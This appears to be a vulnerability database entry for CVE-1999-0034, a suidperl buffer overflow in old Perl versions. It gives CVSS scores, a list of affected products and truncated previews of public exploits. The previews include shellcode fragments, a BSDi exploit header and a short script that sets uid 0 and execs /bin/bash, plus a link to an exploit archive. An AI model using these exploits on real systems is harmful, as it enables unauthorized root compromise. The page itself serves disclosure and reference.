Published: 29/05/1997 Updated: 17/08/2022

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 740

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Buffer overflow in suidperl (sperl), Perl 4.x and 5.x.

Vulnerable Product	Search on Vulmon	Subscribe to Product
larry wall perl 5.3
sgi freeware 1.0
sgi freeware 2.0
bsdi bsd os 3.0
bsdi bsd os 2.1
redhat linux 4.1
redhat linux 4.0
redhat linux 4.2

source: wwwsecurityfocuscom/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl' When this program is installed setuid root the overflows may lead to a local root compromise #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? :) $| = 1; $shellcode = "\x9 ...

/* (BSDi)suidperl[] buffer overflow, by v9[v9@fakehaloorg] this is that old buffer overflow in suidperl, but i never saw any version of it for BSDi so, here it is this gives euid=0 (BSDi/30) */ #define PATH "/usr/bin/suidperl" /* path to suidperl on BSDi/30 */ #define DEFAULT_OFFSET -5000 /* general offset, a lot of room */ static ...

#!/usr/bin/suidperl -U $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); # milw0rmcom [1996-06-01] ...

source: wwwsecurityfocuscom/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl' When this program is installed setuid root the overflows may lead to a local root compromise githubcom/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19547tgz ...

NVD-CWE-Other https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0034 https://nvd.nist.gov https://www.exploit-db.com/exploits/19546/

CVE-1999-0034

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect